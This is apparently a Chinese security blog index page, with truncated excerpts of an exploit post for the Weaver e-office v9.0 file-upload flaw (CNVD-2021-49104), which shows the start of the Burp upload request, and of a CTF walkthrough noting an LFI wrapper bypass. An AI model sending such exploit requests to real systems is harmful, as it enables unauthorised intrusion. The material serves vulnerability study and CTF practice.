泛微 e-office v9.0 文件上传漏洞(CNVD-2021-49104) PHP
影响版本:泛微 e-office v9.0
burp 发包:
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 Host: 127.0.0.1:7899 User-Agent: Mozilla/5.0 (Windows NT 1...
标签: 漏洞
谷安学院CISP-PTS渗透测试专家认证-预报名测试题目解答 技术文章
第一题:
直接 POST :http://103.66.216.51:9997/index.php?a=1 POST数据:b=2 即可拿到 key1:T0kS7r3c
第二题:
简单的代码审计,经典的 LFI ,做了简单的限制,不能用 php:// 伪协议,最简单的就是用其他伪协议代替
<?php show_source(__FILE__); echo $...
标签: CTF